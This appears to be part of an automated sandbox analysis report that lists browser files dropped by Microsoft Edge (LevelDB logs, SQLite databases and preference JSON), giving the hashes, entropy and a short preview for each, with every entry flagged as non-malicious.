                                                                                                                                                                                                                                                        SHA1:3559686AF72C61DF06809300D6FFE6ACA8400810
                                                                                                                                                                                                                                                        SHA-256:A7016E87EB188A3834FA2E9349041612092F338869E74EF9F41217077DB82E4E
                                                                                                                                                                                                                                                        SHA-512:B698D8B88C12300BA8B67588F6AA920472FCE3C98583F1B736321801825BADDD96C09A3006FE79512CBB685E9CB1760A86D6A474514799CC014867E05B63916A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:45.671 1970 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/20-18:49:45.672 1970 Recovering log #3.2024/11/20-18:49:45.676 1970 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):422
                                                                                                                                                                                                                                                        Entropy (8bit):5.281277031552386
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:n/vTv4YebvqBZFUt8k/JZ/+k/F5LYebvqBaJ:n/vz4Yebvyg8k/Jt/XLYebvL
                                                                                                                                                                                                                                                        MD5:C39041EE731E23986DDF6C9A9236E767
                                                                                                                                                                                                                                                        SHA1:3559686AF72C61DF06809300D6FFE6ACA8400810
                                                                                                                                                                                                                                                        SHA-256:A7016E87EB188A3834FA2E9349041612092F338869E74EF9F41217077DB82E4E
                                                                                                                                                                                                                                                        SHA-512:B698D8B88C12300BA8B67588F6AA920472FCE3C98583F1B736321801825BADDD96C09A3006FE79512CBB685E9CB1760A86D6A474514799CC014867E05B63916A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:45.671 1970 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/20-18:49:45.672 1970 Recovering log #3.2024/11/20-18:49:45.676 1970 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                        Entropy (8bit):5.230387704948397
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHAQ+q2P923oH+TcwtpIFUt8YHtgZmw+YHtQVkwO923oH+Tcwta/WLJ:n4v4YebmFUt8kq/+kW5LYebaUJ
                                                                                                                                                                                                                                                        MD5:D9384EF6D47DC46DEFD66763D3FAB72C
                                                                                                                                                                                                                                                        SHA1:D5A2F56BFDCC62C084A14EF7004F6E1D24B8394E
                                                                                                                                                                                                                                                        SHA-256:2DFCC49C6F8058E5C868F56AF3109F0D8012E63956E5BB3A37CE8719031A1BC0
                                                                                                                                                                                                                                                        SHA-512:40CF7301DC0446D68D53EBB283772D3EB08BA3C5C9C89BE26BAF30CAF795EBBA38CF31FC99ACB9FDDB5048A7C83D63CD4757BD3E688809AA28712245AE759C5E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:27.236 1df8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/20-18:49:27.237 1df8 Recovering log #3.2024/11/20-18:49:27.237 1df8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                        Entropy (8bit):5.230387704948397
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHAQ+q2P923oH+TcwtpIFUt8YHtgZmw+YHtQVkwO923oH+Tcwta/WLJ:n4v4YebmFUt8kq/+kW5LYebaUJ
                                                                                                                                                                                                                                                        MD5:D9384EF6D47DC46DEFD66763D3FAB72C
                                                                                                                                                                                                                                                        SHA1:D5A2F56BFDCC62C084A14EF7004F6E1D24B8394E
                                                                                                                                                                                                                                                        SHA-256:2DFCC49C6F8058E5C868F56AF3109F0D8012E63956E5BB3A37CE8719031A1BC0
                                                                                                                                                                                                                                                        SHA-512:40CF7301DC0446D68D53EBB283772D3EB08BA3C5C9C89BE26BAF30CAF795EBBA38CF31FC99ACB9FDDB5048A7C83D63CD4757BD3E688809AA28712245AE759C5E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:27.236 1df8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/20-18:49:27.237 1df8 Recovering log #3.2024/11/20-18:49:27.237 1df8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                                        Entropy (8bit):1.2649482412809963
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:8/2qOB1nxCkM0SAELyKOMq+8yC8F/YfU5m+OlTLVumF:Bq+n0J09ELyKOMq+8y9/OwS
                                                                                                                                                                                                                                                        MD5:BB728B7A584078A2CC342CE1841F987A
                                                                                                                                                                                                                                                        SHA1:3EAF922DBA0E47C78BB0E591055DD9548B22A8E1
                                                                                                                                                                                                                                                        SHA-256:9758F748021A20AF59E1DD25EEA4AD0B9C6F8112A9C18ADD6260D6924D9923AC
                                                                                                                                                                                                                                                        SHA-512:28A55E0184D3AC2336778DA7832B6A3AB63FBD5002FBD96DD1198E46DEE50D2A51B7FB591B5A1DF00EB385D78856664CE7CF82AD0A1557E4CA10A29FFBAECBD1
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                                        Entropy (8bit):0.4672836816071326
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0IFF:v7doKsKuKZKlZNmu46yjx0iF
                                                                                                                                                                                                                                                        MD5:49409BD3A075811CE9BA95A1FEF81516
                                                                                                                                                                                                                                                        SHA1:BBD0C29C2DA5496B5F4B0287D4F8DADC6E7300F2
                                                                                                                                                                                                                                                        SHA-256:21CACD29FDE0C8A6708467E0E77D8E098AA741AE92FE991F8AA33C85D2317392
                                                                                                                                                                                                                                                        SHA-512:0FDE3F3DD0DA1CC8205052A3B8D1C9534218F47D22DAECF1738CEFE6854E09F3958EB20CA289446B0A4E9AE78A8F968D6312E8117A9ADCFF0AA87D1E6A993F36
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):28366
                                                                                                                                                                                                                                                        Entropy (8bit):5.557613120525479
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:EM/8Nf7pLGLP+DWPmwfe18F1+UoAYDCx9Tuqh0VfUC9xbog/OVVgeC1rwHuplNt7:EM/8NZcP+DWPmwfe1u1jawJC+HKt7
                                                                                                                                                                                                                                                        MD5:A1DED5173165A148B64515DF6BC01AB4
                                                                                                                                                                                                                                                        SHA1:29F3D8C6CE27D7A868B95659131160CC47C56E0E
                                                                                                                                                                                                                                                        SHA-256:A08CE64E9484674802A5CD077E30CDE68A8A590397A5C97B2D142141F471C3B2
                                                                                                                                                                                                                                                        SHA-512:A34352C1F2D9FB155374B14B2A9A59973EB83287B31EF18D429941EF556985AE630079A1BC5BF177D6C84E75F105A90F60E417DF9401B33F301D7400DA2DC3B8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376620167251414","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376620167251414","location":5,"ma
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):11755
                                                                                                                                                                                                                                                        Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                        MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                        SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                        SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                        SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):115717
                                                                                                                                                                                                                                                        Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                        MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                        SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                        SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                        SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):9712
                                                                                                                                                                                                                                                        Entropy (8bit):5.111931167584568
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:st1kdp6s0NsZihUkqE48+bV+FWYQA66WiaFIMYsPGYJ:st1Q6s0NfhmbGxQx6WiaTYS
                                                                                                                                                                                                                                                        MD5:4646C4DFEE1D3900D73E85DB90E066D1
                                                                                                                                                                                                                                                        SHA1:F12A640BFEB84DF4B66E2A378A17C7C68817EFED
                                                                                                                                                                                                                                                        SHA-256:1024A11600EFF96EC1C477A00E6CC285F6DF616D79A4A9E4F788C33A7AB54E90
                                                                                                                                                                                                                                                        SHA-512:3E1D78906F7B7F7654A35E8C09CAEB440EAD8228934C5C8A49D1F41C32B92F2DC29CCF5C2A0EE1A1569C82342B186296B362E2E9C68A83DD1EAD05EE9138397D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376620167792921","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                                                                                                        Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                        MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                        SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                        SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                        SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (16698), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):16699
                                                                                                                                                                                                                                                        Entropy (8bit):5.447823615600259
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:st1PGQSu46s0NfhUY2xWx+TBbGxQwT6WiaTYS:s7OXu5NfuYUdbGio2aTYS
                                                                                                                                                                                                                                                        MD5:5B13008D79F2B0E16F5BDEEAB1FCA3DE
                                                                                                                                                                                                                                                        SHA1:02B7DFFD24F4DB484C0163EFCA6CBCDB86270400
                                                                                                                                                                                                                                                        SHA-256:27CDE4EB90AC0A3CC2F93D8E6B24DA2A7D410D2B9191DF44B82B4C24E245119C
                                                                                                                                                                                                                                                        SHA-512:A56891642F5802E31FC9A7523D2D7F7A1F618F4037BEDE1C5EEB2E5079A4B1D30D58A07049AD5D3C9D8E8A198F26297437BC7B02D980CA56F8BAE75EB861D801
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376620167792921","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):40470
                                                                                                                                                                                                                                                        Entropy (8bit):5.561018568896526
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:E5d8rf7pLGLPJDWPmwff18F1+UoAYDCx9Tuqh0VfUC9xbog/OVJAfgeF1rwBfueE:E5d8rZcPJDWPmwff1u1jakAfJF+BfueE
                                                                                                                                                                                                                                                        MD5:0119E9ED152013EFF10613B26A88759B
                                                                                                                                                                                                                                                        SHA1:C398E7670BFEEF71644A2464E96EE15A235FA766
                                                                                                                                                                                                                                                        SHA-256:4F4B0BB2376F5F6DD604E13E2282FD43146CF5739C6033D4DDC89262AB652F9C
                                                                                                                                                                                                                                                        SHA-512:2E37728CF7298A8660FAF679A56D460E7008462C6C9B587922A5191897DA3E2B016037373E33265C712267270E85D822FC41E632AE1425B446C33A8C8A90A1F0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376620167251414","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376620167251414","location":5,"ma
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                                        Entropy (8bit):0.10214231200163647
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:+i+i1BspEjVl/PnnnnnnnnnnnvoQ/Eou:+HloPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                        MD5:4F7DBD7F67ADE695010BF1F4239899FE
                                                                                                                                                                                                                                                        SHA1:166588950892EF1EE57376EFE38A92BD5AE25D85
                                                                                                                                                                                                                                                        SHA-256:F08559E1BC2FAB2A71B23DFFDB0FB5119DFD56AFC24DC0230764AA640AC5854C
                                                                                                                                                                                                                                                        SHA-512:B60CDAEA23DDA11595F601559BAAA183FDA10C217C3864BE640343851C46652A936A3BB6DCBC17D509294313F5767F85E7AFB5831F9DFC989F1BB6A6F45CA158
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:..-.............M........e...y.B.4..}.....A../..-.............M........e...y.B.4..}.....A../........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):317272
                                                                                                                                                                                                                                                        Entropy (8bit):0.888580870373045
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:G25zzX23AGGlHA2MhAHAOxUWAHAxWSGWAHAyt1CgGWAHA8N+ELgGWAHAVIgfELg9:AVf
                                                                                                                                                                                                                                                        MD5:E23DE85DC572A1806CB364C3149C7128
                                                                                                                                                                                                                                                        SHA1:E2DD15111FE69E156A42321C15B3F11D56BF1FFD
                                                                                                                                                                                                                                                        SHA-256:E0BD9EC9CEA7D5375405C8EFFA258C186994F7B2F2CB693D78AB2DD04579DC34
                                                                                                                                                                                                                                                        SHA-512:CC9C80F0B7CBE27C9AE177E7CE7286778B508E24B41AE2D67912E5C35CBEA5663762F470ADF847A70132CDDE559AFFFC9F3D429D6D7CF3C6A93B3DFEDD54C817
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):628
                                                                                                                                                                                                                                                        Entropy (8bit):3.2247372452445657
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:/XntM+iTl3sedhOKOuuuuuuuuuuuuuuuuuuuuuuuVsedhOO:Wlc8NOuuuuuuuuuuuuuuuuuuuuuuuG8n
                                                                                                                                                                                                                                                        MD5:B1244F0BAA5316B70CF1C8E6EF0EB6D9
                                                                                                                                                                                                                                                        SHA1:173AC63BF5FF312CB319279BC5FCCB5C9CD018B1
                                                                                                                                                                                                                                                        SHA-256:8A08E4BD212A1B3F4C4998325A781FDC8AE9D631CEFCF652E4F75048467623AE
                                                                                                                                                                                                                                                        SHA-512:E350FA4F119E5A040060B001FB6C07CB19CA7499BFEE8D0332054F0A7F3E0BAABD300DC11ED9A83407EA126D6A019CA8C2BF9140EFEBF648E8D7C5812DBFD780
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............8.I.0................39_config..........6.....n ....1
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                                                                                                        Entropy (8bit):5.217609085124426
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHiCQ+q2P923oH+TcwtfrK+IFUt8YHFCgZmw+YHFCQVkwO923oH+TcwtfrUeLJ:niev4Yeb23FUt8kZ/+kz5LYeb3J
                                                                                                                                                                                                                                                        MD5:4793DD82B5EE25F4860B06D9390297D4
                                                                                                                                                                                                                                                        SHA1:BD7F2D39E2CF7005AF83CBD38E2B00BF38DB1E15
                                                                                                                                                                                                                                                        SHA-256:A9D43A02D8421D9767FBA520E5D79AB10334174324A10467CF912F606EAE9E55
                                                                                                                                                                                                                                                        SHA-512:3696D5142C8C9FA4147FF91360DFCFC78956CD2DBE397941DE1E316DA6FD655D2708E672773A32E9F129F3FB6BFD63BFFDE2A47EA6179EE4D51F71CDE05E8460
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:27.907 1df8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/20-18:49:27.908 1df8 Recovering log #3.2024/11/20-18:49:27.908 1df8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
